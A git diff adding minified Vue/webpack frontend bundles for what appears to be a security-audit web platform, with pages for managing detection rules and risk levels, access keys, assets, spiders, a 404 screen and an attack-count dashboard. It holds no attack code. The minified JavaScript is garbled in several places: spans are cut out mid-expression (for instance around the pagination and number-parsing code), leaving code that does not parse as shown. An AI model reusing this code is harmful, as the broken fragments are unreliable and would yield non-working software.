{return[l("div",{staticClass:"grid-content bg-purple-light"},[l("el-button",{staticClass:"ml0 mt5",attrs:{size:"mini"},on:{click:function(l){return e.lookBtn(t.row)}}},[e._v("查看")])],1)]}}])})],1),l("div",{staticClass:"row"},[l("pagination",{directives:[{name:"show",rawName:"v-show",value:e.total>0,expression:"total > 0"}],staticStyle:{"margin-left":"-20px","margin-top":"-10px"},attrs:{total:e.total,page:e.listQuery.page,limit:e.listQuery.limit},on:{"update:page":function(t){return e.$set(e.listQuery,"page",t)},"update:limit":function(t){return e.$set(e.listQuery,"limit",t)},pagination:e.getRegulationList}})],1),l("el-drawer",{attrs:{visible:e.messagePop,direction:e.direction,size:e.newAlterSize,title:"查看规则"},on:{"update:visible":function(t){e.messagePop=t}}},[l("div",{staticClass:"demo-drawer__content"},[l("el-form",{ref:"reportAll",staticClass:"elfrom",attrs:{model:e.reportAll,"label-width":"80px"}},[l("el-form-item",{attrs:{label:"规则名称:"}},[e.editFlag?l("span",{staticStyle:{"margin-right":"10px"}},[e._v(e._s(e.reportAll.name))]):l("el-input",{staticClass:"ipt",attrs:{size:"small"},model:{value:e.reportAll.name,callback:function(t){e.$set(e.reportAll,"name",t)},expression:"reportAll.name"}})],1),e.disabled_s?l("el-form-item",{attrs:{label:"风险级别:"}},[l("el-select",{attrs:{disabled:"",size:"small"},model:{value:e.reportAll.grade,callback:function(t){e.$set(e.reportAll,"grade",t)},expression:"reportAll.grade"}},[l("el-option",{attrs:{label:"低危",value:"0"}}),l("el-option",{attrs:{label:"中危",value:"1"}}),l("el-option",{attrs:{label:"高危",value:"2"}})],1)],1):l("el-form-item",{attrs:{label:"风险级别:"}},[l("el-select",{attrs:{size:"small"},model:{value:e.reportAll.grade,callback:function(t){e.$set(e.reportAll,"grade",t)},expression:"reportAll.grade"}},[l("el-option",{attrs:{label:"低危",value:"0"}}),l("el-option",{attrs:{label:"中危",value:"1"}}),l("el-option",{attrs:{label:"高危",value:"2"}})],1)],1),l("el-form-item",{attrs:{label:"规则内容:"}},[e.editFlag?l("span",{staticClass:"rule_s",staticStyle:{"margin-right":"10px"}},[e._v(e._s(e.reportAll.content))]):l("el-input",{staticClass:"ipt1",attrs:{type:"textarea"},model:{value:e.reportAll.content,callback:function(t){e.$set(e.reportAll,"content",t)},expression:"reportAll.content"}})],1),e.disabled_s?l("el-form-item",{attrs:{label:"状态:"}},[l("el-select",{attrs:{disabled:"",size:"small"},model:{value:e.reportAll.state,callback:function(t){e.$set(e.reportAll,"state",t)},expression:"reportAll.state"}},[l("el-option",{attrs:{label:"待启用",value:"0"}}),l("el-option",{attrs:{label:"启用",value:"1"}}),l("el-option",{attrs:{label:"禁用",value:"2"}})],1)],1):l("el-form-item",{attrs:{label:"状态:"}},[l("el-select",{attrs:{size:"small"},model:{value:e.reportAll.state,callback:function(t){e.$set(e.reportAll,"state",t)},expression:"reportAll.state"}},[l("el-option",{attrs:{label:"待启用",value:"0"}}),l("el-option",{attrs:{label:"启用",value:"1"}}),l("el-option",{attrs:{label:"禁用",value:"2"}})],1)],1)],1),l("div",{staticClass:"demo-drawer__footer"},[e.editFlag?l("el-button",{attrs:{type:"primary",size:"small"},on:{click:function(t){return e.amendBtn()}}},[e._v(" 修改")]):l("el-button",{attrs:{type:"primary",size:"small"},on:{click:function(t){return e.confirmEditBtn()}}},[e._v(" 确认修改")]),l("el-button",{attrs:{type:"danger",size:"small"},on:{click:function(t){return e.deleteBtn()}}},[e._v(" 删除")]),l("el-button",{attrs:{size:"small"},on:{click:function(t){return e.returnBtn()}}},[e._v(" 返回")])],1)],1)]),l("el-drawer",{attrs:{title:"新建规则",visible:e.newRulesPop,direction:e.direction,size:e.newAlterSize},on:{"update:visible":function(t){e.newRulesPop=t}}},[l("div",{staticClass:"demo-drawer__content"},[l("el-form",{ref:"newRulesAll",staticClass:"elfrom",attrs:{model:e.newRulesAll,"label-width":"80px"}},[l("el-form-item",{attrs:{label:"规则名称:"}},[l("el-input",{staticClass:"ipt",attrs:{size:"small",placeholder:"请输入规则名称"},model:{value:e.newRulesAll.designation,callback:function(t){e.$set(e.newRulesAll,"designation",t)},expression:"newRulesAll.designation"}})],1),l("el-form-item",{attrs:{label:"风险级别:"}},[l("el-select",{attrs:{size:"small"},model:{value:e.newRulesAll.risk,callback:function(t){e.$set(e.newRulesAll,"risk",t)},expression:"newRulesAll.risk"}},[l("el-option",{attrs:{label:"低危",value:"0"}}),l("el-option",{attrs:{label:"中危",value:"1"}}),l("el-option",{attrs:{label:"高危",value:"2"}})],1)],1),l("el-form-item",{attrs:{label:"规则内容:"}},[l("el-input",{staticClass:"ipt1",attrs:{type:"textarea",placeholder:"请输入规则内容"},model:{value:e.newRulesAll.content,callback:function(t){e.$set(e.newRulesAll,"content",t)},expression:"newRulesAll.content"}})],1),l("el-form-item",{attrs:{label:"状态:"}},[l("el-select",{attrs:{size:"small"},model:{value:e.newRulesAll.state,callback:function(t){e.$set(e.newRulesAll,"state",t)},expression:"newRulesAll.state"}},[l("el-option",{attrs:{label:"待启用",value:"0"}}),l("el-option",{attrs:{label:"启用",value:"1"}}),l("el-option",{attrs:{label:"禁用",value:"2"}})],1)],1)],1),l("div",{staticClass:"demo-drawer__footer"},[l("el-button",{attrs:{size:"small"},on:{click:function(t){return e.returnRulesBtn()}}},[e._v(" 返回")]),l("el-button",{attrs:{type:"primary",size:"small"},on:{click:function(t){return e.RulesBtn()}}},[e._v(" 新建规则")])],1)],1)])],1)},a=[],n=(l("d3b7"),l("25f0"),l("ac1f"),l("00b4"),l("b0c0"),l("333d")),i=l("b775"),r=l("4328"),o=l.n(r);function u(e){return i["a"].post("/rules/lists",o.a.stringify(e))}function c(e){return i["a"].post("/rules/add",o.a.stringify(e))}function d(e){return i["a"].post("/rules/read",o.a.stringify(e))}function p(e){return i["a"].post("/rules/change",o.a.stringify(e))}function g(e){return i["a"].post("/rules/delete",o.a.stringify(e))}var m={name:"",components:{Pagination:n["a"]},props:{},data:function(){return{newAlterSize:"30%",order_desc:"desc",disabled_s:!1,BusinessPop:!1,rule_id:"",newRulesAll:{designation:"",risk:"0",content:"",state:"0"},newRulesPop:!1,msg:"商业版才有这个功能,请购买商业版",editFlag:!0,rulesTriggerCount:"rulesTriggerCount",messagePop:!1,direction:"rtl",listLoading:!1,reportAll:{preview:"",name:"",grade:"",amount:"",content:"",state:""},regulationLists:[],regulationPage:{currentPage:1,pageSize:10,total:0},searchService:{RulesName:"",RiskLevel:""},total:0,listQuery:{importance:void 0,title:void 0,type:void 0,page:1,limit:10}}},computed:{},watch:{},created:function(){},mounted:function(){this.getRegulationList(),this.checkDv()},methods:{returnRulesBtn:function(){this.newRulesPop=!1},RulesBtn:function(){var e=this,t=this.newRulesAll.content.toString(),l="",s=/^[\u4E00-\u9FA5]+$/;l=s.test(t)?btoa(encodeURIComponent(t)):btoa(t),c({rulesName:this.newRulesAll.designation,rulesLevel:this.newRulesAll.risk,rulesRegex:l,rulesStatus:this.newRulesAll.state}).then((function(t){1===t.status?(e.$message.success(t.msg),e.newRulesPop=!1,e.newRulesAll.designation="",e.newRulesAll.risk="0",e.newRulesAll.content="",e.newRulesAll.state="0",e.getRegulationList()):(e.$message.error(t.msg),e.getRegulationList())}))},checkDv:function(){var e=document.body.clientWidth;1440!=e&&(this.newAlterSize="23%")},newRulesBtn:function(){this.newRulesAll.designation="",this.newRulesAll.risk="0",this.newRulesAll.content="",this.newRulesAll.state="0",this.newRulesPop=!0},editionRulesBtn:function(){this.$message.info("商业版规则请联系微信:13825687872")},sureBtn:function(){this.BusinessPop=!1},deleteBtn:function(){var e=this;g({id:this.rule_id}).then((function(t){1===t.status?(e.$message.success(t.msg),e.messagePop=!1,e.getRegulationList()):(e.$message.error(t.msg),e.getRegulationList())}))},confirmEditBtn:function(){var e=this;this.editFlag=!0;var t=this.reportAll.content.toString(),l="",s=/^[\u4E00-\u9FA5]+$/;l=s.test(t)?btoa(encodeURIComponent(t)):btoa(t),p({rulesName:this.reportAll.name,rulesLevel:this.reportAll.grade,rulesRegex:l,rulesStatus:this.reportAll.state,id:this.rule_id}).then((function(t){1===t.status?(e.$message.success(t.msg),e.messagePop=!1,e.getRegulationList()):(e.$message.error(t.msg),e.getRegulationList())}))},amendBtn:function(){this.editFlag=!1,this.disabled_s=!1},returnBtn:function(){this.messagePop=!1},lookBtn:function(e){var t=this;this.rule_id=e.id,this.editFlag=!0,this.messagePop=!0,this.disabled_s=!0,d({Id:e.id}).then((function(e){if(1==e.status){t.reportAll.preview=e.data.id,t.reportAll.name=e.data.rulesName,t.reportAll.grade=e.data.rulesLevel.toString(),t.reportAll.amount=e.data.rulesTriggerCount,t.reportAll.state=e.data.rulesStatus.toString();var l=e.data.rulesRegex;t.reportAll.content=atob(decodeURI(l))}else t.$message.error(e.msg)}))},handleSort:function(e){"ascending"==e.order?(this.rulesTriggerCount="rulesTriggerCount",this.order_desc="desc"):"descending"==e.order&&(this.rulesTriggerCount="rulesTriggerCount ",this.order_desc="asc"),this.getRegulationList()},handleChange:function(e){this.regulationPage.currentPage=1,this.getRegulationList()},stateFormat:function(e,t){return 0===e.rulesLevel?"低危":1==e.rulesLevel?"中危":2==e.rulesLevel?"高危":void 0},stateFormat_status:function(e,t){return 0===e.rulesStatus?"待启用":1==e.rulesStatus?"启用":2==e.rulesStatus?"禁用":3==e.rulesStatus?"异常":void 0},getRegulationList:function(){var e=this,t={page:this.listQuery.page,pageSize:this.listQuery.limit,Sort:this.rulesTriggerCount,Order:this.order_desc};""!=this.searchService.interviewer&&(t["RulesName"]=this.searchService.interviewer),0!=this.searchService.RiskLevel&&(t["RiskLevel"]=this.searchService.RiskLevel),this.listLoading=!0,u(t).then((function(t){e.listLoading=!1,1===t.status?(e.regulationLists=t.data.list,e.listQuery.page=t.data.page,e.listQuery.limit=t.data.pageSize,e.total=t.data.total):e.$message.error(t.msg)}))},searchServiceBtn:function(){this.listQuery.page=1,this.getRegulationList()}}},f=m,h=(l("a607"),l("ed6d"),l("2877")),v=Object(h["a"])(f,s,a,!1,null,"064445cc",null);t["default"]=v.exports},ed6d:function(e,t,l){"use strict";l("029b")},f1df:function(e,t,l){"use strict";l("8312")}}]); \ No newline at end of file diff --git a/frontend/dist/static/js/chunk-1c1b1da2.c903570d.js b/frontend/dist/static/js/chunk-1c1b1da2.c903570d.js new file mode 100644 index 0000000..48bf459 --- /dev/null +++ b/frontend/dist/static/js/chunk-1c1b1da2.c903570d.js @@ -0,0 +1 @@ +(window["webpackJsonp"]=window["webpackJsonp"]||[]).push([["chunk-1c1b1da2"],{"12c8":function(e,t,a){},"24e4":function(e,t,a){"use strict";a("12c8")},"333d":function(e,t,a){"use strict";var n=function(){var e=this,t=e.$createElement,a=e._self._c||t;return a("div",{staticClass:"pagination-container",class:{hidden:e.hidden}},[a("el-pagination",e._b({attrs:{background:e.background,"current-page":e.currentPage,"page-size":e.pageSize,layout:e.layout,"page-sizes":e.pageSizes,total:e.total},on:{"update:currentPage":function(t){e.currentPage=t},"update:current-page":function(t){e.currentPage=t},"update:pageSize":function(t){e.pageSize=t},"update:page-size":function(t){e.pageSize=t},"size-change":e.handleSizeChange,"current-change":e.handleCurrentChange}},"el-pagination",e.$attrs,!1))],1)},r=[];a("a9e3");Math.easeInOutQuad=function(e,t,a,n){return e/=n/2,e<1?a/2*e*e+t:(e--,-a/2*(e*(e-2)-1)+t)};var i=function(){return window.requestAnimationFrame||window.webkitRequestAnimationFrame||window.mozRequestAnimationFrame||function(e){window.setTimeout(e,1e3/60)}}();function s(e){document.documentElement.scrollTop=e,document.body.parentNode.scrollTop=e,document.body.scrollTop=e}function o(){return document.documentElement.scrollTop||document.body.parentNode.scrollTop||document.body.scrollTop}function c(e,t,a){var n=o(),r=e-n,c=20,l=0;t="undefined"===typeof t?500:t;var u=function e(){l+=c;var o=Math.easeInOutQuad(l,n,r,t);s(o),l10,expression:"listQuery.total > 10"}],staticStyle:{"margin-left":"-20px","margin-top":"-10px"},attrs:{total:e.listQuery.total,page:e.listQuery.page,limit:e.listQuery.limit},on:{"update:page":function(t){return e.$set(e.listQuery,"page",t)},"update:limit":function(t){return e.$set(e.listQuery,"limit",t)},pagination:e.getList}})],1)],1),a("el-drawer",{attrs:{visible:e.drawerCreateStatus,direction:e.direction,size:e.newAlterSize,wrapperClosable:!1,title:"新建授权"},on:{"update:visible":function(t){e.drawerCreateStatus=t}}},[a("div",{staticClass:"demo-drawer__content"},[a("div",{staticClass:"tip",staticStyle:{margin:"20px","margin-top":"-1px","font-size":"14px",color:"#5e6d82","line-height":"1.5em"}},[e._v(" 授权备注主要用于区分这个授权用来做什么用的,比如:某公司众测使用。 ")]),a("el-form",{ref:"createModel",staticStyle:{"margin-left":"5px"},attrs:{model:e.createModel,inline:!1,"label-width":"80px"}},[a("el-form-item",{attrs:{label:"授权备注: "}},[a("el-input",{attrs:{type:"textarea"},model:{value:e.createModel.secretName,callback:function(t){e.$set(e.createModel,"secretName",t)},expression:"createModel.secretName"}})],1)],1),a("div",{staticClass:"demo-drawer__footer"},[a("el-button",{attrs:{size:"small"},on:{click:e.drawerCreateOpera}},[e._v(" 返回")]),a("el-button",{attrs:{type:"primary",size:"small"},on:{click:e.drawerCreate}},[e._v(" 新建授权AK")])],1)],1)])],1)},r=[],i=a("333d"),s=a("b775"),o=a("4328"),c=a.n(o);function l(e){return s["a"].post("/secrets/lists",c.a.stringify(e))}function u(e){return s["a"].post("/secrets/add",c.a.stringify(e))}function d(e){return s["a"].post("/secrets/changeStatus",c.a.stringify(e))}function f(e){return s["a"].post("/secrets/delete",c.a.stringify(e))}var p={name:"",components:{Pagination:i["a"]},props:{},data:function(){return{drawerCreateStatus:!1,listLoading:!1,newAlterSize:"20%",listQuery:{page:1,limit:10,total:0},listDataObject:{outSideListData:[]},markdownOption:{bold:!0,italic:!0,underline:!0,strikethrough:!0,quote:!0,code:!0,imagelink:!0,fullscreen:!0,link:!0,trash:!0,subfield:!0},createModel:{},direction:"rtl"}},computed:{},watch:{},created:function(){},mounted:function(){this.getList()},methods:{drawerCreateOpera:function(){this.drawerCreateStatus?this.drawerCreateStatus=!1:this.drawerCreateStatus=!0},StatusChange:function(e){var t=this;this.$confirm("是否确定切换授权状态?","确认信息",{distinguishCancelAndClose:!0,confirmButtonText:"确定切换",cancelButtonText:"返回"}).then((function(){d({Sid:e.secretId}).then((function(e){1===e.status?(t.$message.success(e.msg),t.getList()):t.$message.error(e.msg)}))})).catch((function(e){}))},drawerCreate:function(){var e=this;u(this.createModel).then((function(t){1===t.status?(e.$message.success(t.msg),e.getList(),e.drawerCreateOpera()):e.$message.error(t.msg)}))},drawerDelete:function(e){var t=this;this.$confirm("确定要删除授权吗?","提示",{confirmButtonText:"确定",cancelButtonText:"取消",type:"warning"}).then((function(){f({Sid:e.secretId}).then((function(e){1===e.status&&(t.$message.success(e.msg),t.getList())}))})).catch((function(){}))},checkDv:function(){var e=document.body.clientWidth;e>1619&&(this.newAlterSize="15%")},getList:function(){var e=this;this.listLoading=!0;var t={page:this.listQuery.page,pageSize:this.listQuery.limit};l(t).then((function(t){e.listLoading=!1,1===t.status?(e.listDataObject.outSideListData=t.data.list,e.listQuery.page=t.data.page,e.listQuery.limit=t.data.pageSize,e.listQuery.total=t.data.total):e.$message.error(t.msg)}))}}},g=p,m=(a("48f9"),a("24e4"),a("2877")),h=Object(m["a"])(g,n,r,!1,null,"75df91b8",null);t["default"]=h.exports},a9e3:function(e,t,a){"use strict";var n=a("83ab"),r=a("da84"),i=a("94ca"),s=a("6eeb"),o=a("5135"),c=a("c6b6"),l=a("7156"),u=a("c04e"),d=a("d039"),f=a("7c73"),p=a("241c").f,g=a("06cf").f,m=a("9bf2").f,h=a("58a8").trim,b="Number",w=r[b],y=w.prototype,v=c(f(y))==b,S=function(e){var t,a,n,r,i,s,o,c,l=u(e,!1);if("string"==typeof l&&l.length>2)if(l=h(l),t=l.charCodeAt(0),43===t||45===t){if(a=l.charCodeAt(2),88===a||120===a)return NaN}else if(48===t){switch(l.charCodeAt(1)){case 66:case 98:n=2,r=49;break;case 79:case 111:n=8,r=55;break;default:return+l}for(i=l.slice(2),s=i.length,o=0;or)return NaN;return parseInt(i,n)}return+l};if(i(b,!w(" 0o1")||!w("0b1")||w("+0x1"))){for(var _,C=function(e){var t=arguments.length<1?0:e,a=this;return a instanceof C&&(v?d((function(){y.valueOf.call(a)})):c(a)!=b)?l(new w(S(t)),a,C):S(t)},k=n?p(w):"MAX_VALUE,MIN_VALUE,NaN,NEGATIVE_INFINITY,POSITIVE_INFINITY,EPSILON,isFinite,isInteger,isNaN,isSafeInteger,MAX_SAFE_INTEGER,MIN_SAFE_INTEGER,parseFloat,parseInt,isInteger".split(","),N=0;k.length>N;N++)o(w,_=k[N])&&!o(C,_)&&m(C,_,g(w,_));C.prototype=y,y.constructor=C,s(r,b,C)}},b775:function(e,t,a){"use strict";a("d3b7");var n=a("bc3a"),r=a.n(n),i=a("5c96"),s=r.a.create({baseURL:"/prod-api",timeout:5e3});s.interceptors.request.use((function(e){return e.headers["token"]=localStorage.getItem("token"),e.headers["website"]=localStorage.getItem("websiteDomain"),e.headers["roles"]=localStorage.getItem("roles"),e}),(function(e){return Promise.reject(e)})),s.interceptors.response.use((function(e){var t=e.data;return t}),(function(e){return Object(i["Notification"])({message:e.message,title:"错误",type:"error"}),Promise.reject(e)})),t["a"]=s},f1df:function(e,t,a){"use strict";a("8312")}}]); \ No newline at end of file diff --git a/frontend/dist/static/js/chunk-238c903c.501cdaa8.js b/frontend/dist/static/js/chunk-238c903c.501cdaa8.js new file mode 100644 index 0000000..45dd8c0 --- /dev/null +++ b/frontend/dist/static/js/chunk-238c903c.501cdaa8.js @@ -0,0 +1 @@ +(window["webpackJsonp"]=window["webpackJsonp"]||[]).push([["chunk-238c903c"],{"26fc":function(t,s,e){t.exports=e.p+"static/img/404_cloud.0f4bc32b.png"},"8cdb":function(t,s,e){"use strict";e.r(s);var a=function(){var t=this,s=t.$createElement,e=t._self._c||s;return e("div",{staticClass:"wscn-http404-container"},[e("div",{staticClass:"wscn-http404"},[t._m(0),e("div",{staticClass:"bullshit"},[e("div",{staticClass:"bullshit__oops"},[t._v("OOPS!")]),t._m(1),e("div",{staticClass:"bullshit__headline"},[t._v(t._s(t.message))]),e("div",{staticClass:"bullshit__info"},[t._v("Please check that the URL you entered is correct, or click the button below to return to the homepage.")]),e("a",{staticClass:"bullshit__return-home",attrs:{href:""}},[t._v("Back to home")])])])])},c=[function(){var t=this,s=t.$createElement,a=t._self._c||s;return a("div",{staticClass:"pic-404"},[a("img",{staticClass:"pic-404__parent",attrs:{src:e("a36b"),alt:"404"}}),a("img",{staticClass:"pic-404__child left",attrs:{src:e("26fc"),alt:"404"}}),a("img",{staticClass:"pic-404__child mid",attrs:{src:e("26fc"),alt:"404"}}),a("img",{staticClass:"pic-404__child right",attrs:{src:e("26fc"),alt:"404"}})])},function(){var t=this,s=t.$createElement,e=t._self._c||s;return e("div",{staticClass:"bullshit__info"},[t._v("All rights reserved "),e("a",{staticStyle:{color:"#20a0ff"},attrs:{href:"https://wallstreetcn.com",target:"_blank"}},[t._v("wallstreetcn")])])}],i={name:"Page404",computed:{message:function(){return"The webmaster said that you can not enter this page..."}}},l=i,n=(e("97ef"),e("2877")),r=Object(n["a"])(l,a,c,!1,null,"c095f994",null);s["default"]=r.exports},"97ef":function(t,s,e){"use strict";e("ed94")},a36b:function(t,s,e){t.exports=e.p+"static/img/404.a57b6f31.png"},ed94:function(t,s,e){}}]); \ No newline at end of file diff --git a/frontend/dist/static/js/chunk-2db16da6.20d80f99.js b/frontend/dist/static/js/chunk-2db16da6.20d80f99.js new file mode 100644 index 0000000..a731f81 --- /dev/null +++ b/frontend/dist/static/js/chunk-2db16da6.20d80f99.js @@ -0,0 +1 @@ +(window["webpackJsonp"]=window["webpackJsonp"]||[]).push([["chunk-2db16da6"],{1077:function(t,e,n){"use strict";n("8195")},"333d":function(t,e,n){"use strict";var a=function(){var t=this,e=t.$createElement,n=t._self._c||e;return n("div",{staticClass:"pagination-container",class:{hidden:t.hidden}},[n("el-pagination",t._b({attrs:{background:t.background,"current-page":t.currentPage,"page-size":t.pageSize,layout:t.layout,"page-sizes":t.pageSizes,total:t.total},on:{"update:currentPage":function(e){t.currentPage=e},"update:current-page":function(e){t.currentPage=e},"update:pageSize":function(e){t.pageSize=e},"update:page-size":function(e){t.pageSize=e},"size-change":t.handleSizeChange,"current-change":t.handleCurrentChange}},"el-pagination",t.$attrs,!1))],1)},s=[];n("a9e3");Math.easeInOutQuad=function(t,e,n,a){return t/=a/2,t<1?n/2*t*t+e:(t--,-n/2*(t*(t-2)-1)+e)};var i=function(){return window.requestAnimationFrame||window.webkitRequestAnimationFrame||window.mozRequestAnimationFrame||function(t){window.setTimeout(t,1e3/60)}}();function r(t){document.documentElement.scrollTop=t,document.body.parentNode.scrollTop=t,document.body.scrollTop=t}function o(){return document.documentElement.scrollTop||document.body.parentNode.scrollTop||document.body.scrollTop}function l(t,e,n){var a=o(),s=t-a,l=20,u=0;e="undefined"===typeof e?500:e;var c=function t(){u+=l;var o=Math.easeInOutQuad(u,a,s,e);r(o),u10,expression:"listQuery.total > 10"}],staticStyle:{"margin-left":"-20px","margin-top":"-10px"},attrs:{total:t.listQuery.total,page:t.listQuery.page,limit:t.listQuery.limit},on:{"update:page":function(e){return t.$set(t.listQuery,"page",e)},"update:limit":function(e){return t.$set(t.listQuery,"limit",e)},pagination:t.getList}})],1)],1)],1)},s=[],i=n("333d"),r=n("c2f1"),o={name:"",components:{Pagination:i["a"]},props:{},data:function(){return{actionTableType:"云服务器/云主机",drawerCreateStatus:!1,drawerChangeStatus:!1,listLoading:!1,newAlterSize:"40%",listQuery:{page:1,limit:10,total:0},listDataObject:{outSideListData:[]},createModel:{},changeModel:{},direction:"rtl"}},computed:{},watch:{},created:function(){},mounted:function(){this.getList(),this.checkDv()},methods:{actionChange:function(){console.log(this.actionTableType)},drawerCreateOpera:function(){this.drawerCreateStatus?this.drawerCreateStatus=!1:this.drawerCreateStatus=!0},drawerChangeOpera:function(t){this.changeModel=t,this.drawerChangeStatus?this.drawerChangeStatus=!1:this.drawerChangeStatus=!0},StatusChange:function(t){var e=this;this.$confirm("是否确定切换集群配置状态?","确认信息",{distinguishCancelAndClose:!0,confirmButtonText:"确定切换",cancelButtonText:"返回"}).then((function(){kubernetesChangeStatus({Id:t.Id}).then((function(t){1===t.status?(e.$message.success(t.msg),e.getList()):e.$message.error(t.msg)}))})).catch((function(t){}))},drawerCreate:function(){var t=this;kubernetesAdd(this.createModel).then((function(e){1===e.status?(t.$message.success(e.msg),t.getList(),t.drawerCreateOpera()):t.$message.error("集群配置创建失败,配置无效!")}))},drawerChange:function(){var t=this;kubernetesChange(this.changeModel).then((function(e){1===e.status?(t.$message.success(e.msg),t.getList(),t.drawerCreateOpera()):t.$message.error(e.msg)}))},drawerDelete:function(t){var e=this;this.$confirm("确定要删除资产吗?","提示",{confirmButtonText:"确定",cancelButtonText:"取消",type:"warning"}).then((function(){Object(r["a"])({Id:t.Id}).then((function(t){1===t.status&&(e.$message.success(t.msg),e.getList())}))})).catch((function(){}))},checkDv:function(){var t=document.body.clientWidth;t>1619&&(this.newAlterSize="30%")},getList:function(){var t=this;this.listLoading=!0;var e={page:this.listQuery.page,pageSize:this.listQuery.limit};switch(this.actionTableType){case"云服务器/云主机":e["assetsTypes"]=0;break;case"域名/IP":e["assetsTypes"]=1;break}Object(r["b"])(e).then((function(e){t.listLoading=!1,1===e.status?(t.listDataObject.outSideListData=e.data.list,t.listQuery.page=e.data.page,t.listQuery.limit=e.data.pageSize,t.listQuery.total=e.data.total):t.$message.error(e.msg)}))}}},l=o,u=(n("1077"),n("b1ce"),n("2877")),c=Object(u["a"])(l,a,s,!1,null,"2cb95120",null);e["default"]=c.exports},a9e3:function(t,e,n){"use strict";var a=n("83ab"),s=n("da84"),i=n("94ca"),r=n("6eeb"),o=n("5135"),l=n("c6b6"),u=n("7156"),c=n("c04e"),d=n("d039"),f=n("7c73"),p=n("241c").f,g=n("06cf").f,m=n("9bf2").f,h=n("58a8").trim,b="Number",w=s[b],y=w.prototype,_=l(f(y))==b,S=function(t){var e,n,a,s,i,r,o,l,u=c(t,!1);if("string"==typeof u&&u.length>2)if(u=h(u),e=u.charCodeAt(0),43===e||45===e){if(n=u.charCodeAt(2),88===n||120===n)return NaN}else if(48===e){switch(u.charCodeAt(1)){case 66:case 98:a=2,s=49;break;case 79:case 111:a=8,s=55;break;default:return+u}for(i=u.slice(2),r=i.length,o=0;os)return NaN;return parseInt(i,a)}return+u};if(i(b,!w(" 0o1")||!w("0b1")||w("+0x1"))){for(var v,C=function(t){var e=arguments.length<1?0:t,n=this;return n instanceof C&&(_?d((function(){y.valueOf.call(n)})):l(n)!=b)?u(new w(S(e)),n,C):S(e)},T=a?p(w):"MAX_VALUE,MIN_VALUE,NaN,NEGATIVE_INFINITY,POSITIVE_INFINITY,EPSILON,isFinite,isInteger,isNaN,isSafeInteger,MAX_SAFE_INTEGER,MIN_SAFE_INTEGER,parseFloat,parseInt,isInteger".split(","),I=0;T.length>I;I++)o(w,v=T[I])&&!o(C,v)&&m(C,v,g(w,v));C.prototype=y,y.constructor=C,r(s,b,C)}},b1ce:function(t,e,n){"use strict";n("e7b1")},b775:function(t,e,n){"use strict";n("d3b7");var a=n("bc3a"),s=n.n(a),i=n("5c96"),r=s.a.create({baseURL:"/prod-api",timeout:5e3});r.interceptors.request.use((function(t){return t.headers["token"]=localStorage.getItem("token"),t.headers["website"]=localStorage.getItem("websiteDomain"),t.headers["roles"]=localStorage.getItem("roles"),t}),(function(t){return Promise.reject(t)})),r.interceptors.response.use((function(t){var e=t.data;return e}),(function(t){return Object(i["Notification"])({message:t.message,title:"错误",type:"error"}),Promise.reject(t)})),e["a"]=r},c2f1:function(t,e,n){"use strict";n.d(e,"b",(function(){return r})),n.d(e,"a",(function(){return o})),n.d(e,"f",(function(){return l})),n.d(e,"c",(function(){return u})),n.d(e,"d",(function(){return c})),n.d(e,"e",(function(){return d})),n.d(e,"g",(function(){return f}));var a=n("b775"),s=n("4328"),i=n.n(s);function r(t){return a["a"].post("/assets/lists",i.a.stringify(t))}function o(t){return a["a"].post("/assets/delete",i.a.stringify(t))}function l(t){return a["a"].post("/spiders/lists",i.a.stringify(t))}function u(t){return a["a"].post("/spiders/add",i.a.stringify(t))}function c(t){return a["a"].post("/spiders/changeStatus",i.a.stringify(t))}function d(t){return a["a"].post("/spiders/delete",i.a.stringify(t))}function f(t){return a["a"].post("/spiders/spiderTypes",i.a.stringify(t))}},e7b1:function(t,e,n){},f1df:function(t,e,n){"use strict";n("8312")}}]); \ No newline at end of file diff --git a/frontend/dist/static/js/chunk-30f4db1c.f2dfaa9a.js b/frontend/dist/static/js/chunk-30f4db1c.f2dfaa9a.js new file mode 100644 index 0000000..b7920af --- /dev/null +++ b/frontend/dist/static/js/chunk-30f4db1c.f2dfaa9a.js @@ -0,0 +1 @@ +(window["webpackJsonp"]=window["webpackJsonp"]||[]).push([["chunk-30f4db1c"],{"11f7":function(t,a,e){"use strict";e("7a3f")},"7a3f":function(t,a,e){},9406:function(t,a,e){"use strict";e.r(a);var r=function(){var t=this,a=t.$createElement,e=t._self._c||a;return e("div",{staticClass:"dashboard-container"},[e("el-row",{attrs:{gutter:20}},[e("el-col",{attrs:{span:6}},[e("div",{staticClass:"grid-content bg-purple"},[e("el-card",{attrs:{shadow:"never"}},[t._v(" 审计日志数: "),e("v-countup",{staticStyle:{"font-weight":"bold","margin-left":"10px","font-size":"22px"},attrs:{"start-value":"0","end-value":t.headerCountsVal.AudiLogs}}),t._v("次 ")],1)],1)]),e("el-col",{attrs:{span:6}},[e("div",{staticClass:"grid-content bg-purple"},[e("el-card",{attrs:{shadow:"never"}},[t._v(" 识别攻击数: "),e("v-countup",{staticStyle:{"font-weight":"bold","margin-left":"10px","font-size":"22px"},attrs:{"start-value":"0","end-value":t.headerCountsVal.attackNumber}}),t._v("次 ")],1)],1)]),e("el-col",{attrs:{span:6}},[e("div",{staticClass:"grid-content bg-purple"},[e("el-card",{attrs:{shadow:"never"}},[t._v(" 审计请求数: "),e("v-countup",{staticStyle:{"font-weight":"bold","margin-left":"10px","font-size":"22px"},attrs:{"start-value":"0","end-value":t.headerCountsVal.auditRequests}}),t._v("次 ")],1)],1)]),e("el-col",{attrs:{span:6}},[e("div",{staticClass:"grid-content bg-purple"},[e("el-card",{attrs:{shadow:"never"}},[t._v(" 识别异常数: "),e("v-countup",{staticStyle:{"font-weight":"bold","margin-left":"10px","font-size":"22px"},attrs:{"start-value":"0","end-value":t.headerCountsVal.anomalyNumber}}),t._v("次 ")],1)],1)])],1),e("el-row",{staticStyle:{"margin-top":"20px","margin-bottom":"20px"},attrs:{gutter:20}},[e("el-col",{attrs:{span:24}},[e("div",{staticClass:"grid-content bg-purple"},[e("el-card",{attrs:{shadow:"never"}},[t._v(" 历史波动 